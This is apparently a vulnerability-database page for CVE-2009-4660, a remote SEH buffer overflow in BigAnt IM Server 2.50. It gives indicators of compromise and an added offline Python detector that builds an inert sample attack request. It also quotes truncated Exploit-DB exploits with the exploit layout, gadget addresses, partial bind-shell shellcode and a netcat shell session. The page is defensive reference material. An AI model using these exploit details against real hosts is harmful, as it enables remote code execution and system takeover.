CVE-2009-4660
Published: 2010-03-03
Priority: P2 (75)
CVSS 2.0: 10.0 (critical) · Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public
EPSS: 62.12% (99.1st percentile)
Stack-based buffer overflow in the AntServer Module (AntServer.exe) in BigAnt IM Server 2.50 allows remote attackers to execute arbitrary code via a long GET request to TCP port 6660.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bigantsoft | bigant_messenger | — | — |
Detection & IOCs (extracted from sources)
- The exploit triggers a stack-based SEH overwrite with an oversized HTTP GET request; the SEH record is overwritten at offset 989 bytes into the payload.
- The next-SEH pointer is a short jump (\xeb\x06\x90\x90) that skips over the handler address into the NOP sled and shellcode.
- The SEH handler address in exploit 9673 points to a pop/pop/ret gadget in vbajet32.dll (0x0f9a196a).
- The "universal" variant (exploit 9690) uses a pop/pop/ret gadget in MFC42.DLL (0x6bc420c3) instead.
- The shellcode is encoded with x86/alpha_mixed (EXITFUNC=seh) and opens a bind shell on TCP port 4444. Detection: anomalously large GET requests to TCP port 6660 whose request line carries a long run of high-entropy alphanumeric (alpha_mixed-encoded) data.
- The AntServer service does not restart after exploitation; a single successful attempt kills the service and it is not restarted automatically, so an AntServer outage can serve as a post-exploitation indicator.
- Caveat: exploit 9673 was tested on Windows XP SP3 and exploit 9690 on Windows XP SP2; the SEH gadget addresses (vbajet32.dll, MFC42.DLL) are OS/patch-level specific and may not apply to other environments.
- Caveat: the Metasploit module targets BigAnt Server 2.52 through the USV command, a related but distinct attack surface from the GET-based overflow in 2.50.
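Worked detection example for the indicators above. This is added here and is not code from the page, from Exploit-DB or from Metasploit. It reuses the page's indicators (SEH record at offset 989, the \xeb\x06\x90\x90 next-SEH jump, the two pop/pop/ret addresses, alphanumeric alpha_mixed output) and adds assumptions of its own: the 512-byte request-line threshold, the 200-byte / 4.5-bit alphanumeric-run threshold, the shape of the hostile request (`GET /<payload> HTTP/1.1`), and an inert constructed alphanumeric blob standing in for the shellcode. It runs offline against a benign request and a constructed hostile one:

```python
#!/usr/bin/env python3
"""Detect CVE-2009-4660-style oversized GET requests aimed at AntServer (TCP 6660).

Added example, not taken from the page, Exploit-DB or Metasploit.
Indicators come from the page's IOC list; thresholds and sample requests are assumptions.
"""
import math
import random
import re
import struct

# Indicators from the page's IOC list.
SEH_OFFSET = 989                                      # filler bytes before the SEH record
NSEH_SHORT_JMP = b"\xeb\x06\x90\x90"                  # next-SEH field: short jmp over the handler address
SEH_HANDLERS = {                                      # pop/pop/ret addresses as they appear on the wire (little-endian)
    "vbajet32.dll (exploit 9673)": struct.pack("<I", 0x0F9A196A),
    "MFC42.DLL (exploit 9690)": struct.pack("<I", 0x6BC420C3),
}

# Assumed thresholds (not from the page): a legitimate AntServer GET line is tiny,
# and alpha_mixed output is a long run of mixed-case alphanumerics with high entropy.
MAX_SANE_REQUEST_LINE = 512
MIN_ALNUM_RUN = 200
MIN_RUN_ENTROPY = 4.5
_ALNUM_RUN = re.compile(rb"[A-Za-z0-9]{%d,}" % MIN_ALNUM_RUN)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the byte-value distribution in data (0.0 for empty or single-value runs)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_request(raw: bytes) -> dict:
    """Score one raw HTTP request captured on TCP 6660 against the page's indicators."""
    request_line = raw.split(b"\r\n", 1)[0]
    f = {"oversized_get": False, "nseh_short_jump": False,
         "known_seh_handler": None, "alpha_mixed_blob": False}

    f["oversized_get"] = request_line.startswith(b"GET ") and len(request_line) > MAX_SANE_REQUEST_LINE

    pos = raw.find(NSEH_SHORT_JMP)
    if pos != -1:
        f["nseh_short_jump"] = True
        # The handler address sits right after the 4-byte next-SEH field.
        handler = raw[pos + 4:pos + 8]
        f["known_seh_handler"] = next((name for name, addr in SEH_HANDLERS.items() if addr == handler), None)

    # The 989-byte "A" filler is alphanumeric but has zero entropy, so it alone will not trip this check.
    f["alpha_mixed_blob"] = any(shannon_entropy(m.group(0)) >= MIN_RUN_ENTROPY
                                for m in _ALNUM_RUN.finditer(raw))

    f["suspicious"] = bool(f["oversized_get"] or f["nseh_short_jump"] or f["alpha_mixed_blob"])
    return f


# --- constructed samples (not captured traffic) ----------------------------------------

def constructed_alnum_blob(length: int, seed: int = 2009) -> bytes:
    """Inert mixed-case alphanumeric bytes with the statistical look of alpha_mixed output."""
    alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    rng = random.Random(seed)
    return bytes(rng.choice(alphabet) for _ in range(length))


def sample_attack_request(handler_name: str = "vbajet32.dll (exploit 9673)") -> bytes:
    """Hostile GET laid out as the page describes: filler, nSEH jump, handler, NOP sled, payload.
    The request shape (GET /<payload> HTTP/1.1) and the inert blob are assumptions."""
    layout = (b"A" * SEH_OFFSET + NSEH_SHORT_JMP + SEH_HANDLERS[handler_name]
              + b"\x90" * 16 + constructed_alnum_blob(400))
    return b"GET /" + layout + b" HTTP/1.1\r\n\r\n"


SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10:6660\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("benign", SAMPLE_BENIGN), ("attack", sample_attack_request())):
        print(label, inspect_request(req))
```

The entropy gate matters: a plain filler of repeated bytes is alphanumeric too, so a length-only rule would fire on any padding; requiring both a long alphanumeric run and high entropy is what separates encoder output from junk. The handler-address match is the most specific indicator but also the most brittle, since it only covers the two gadgets the public exploits happen to use.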
No detection rules found.
Exploit-DB: BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH) · EDB-ID 9673 · 2009-09-15
---
```python
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s <host> <port>\n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])  # port 6660 by default

# windows/shell_bind_tcp - 696 bytes Encoder:
# (the remainder of the listing is not reproduced on this page)
```
Exploit-DB: BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH) · EDB-ID 9690 · 2009-09-15
---
```python
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660
import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s <host> <port>\n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])  # port 6660 by default

# x86/alpha_mixed-encoded windows/shell_bind_tcp; the listing is cut off mid-string on this page
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x
```
Metasploit: BigAnt Server 2.52 USV Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/36704
- http://www.attrition.org/pipermail/vim/2009-September/002271.html
- http://www.exploit-db.com/exploits/9673
- http://www.exploit-db.com/exploits/9690
- http://www.securityfocus.com/bid/36407
- http://www.vupen.com/english/advisories/2009/2679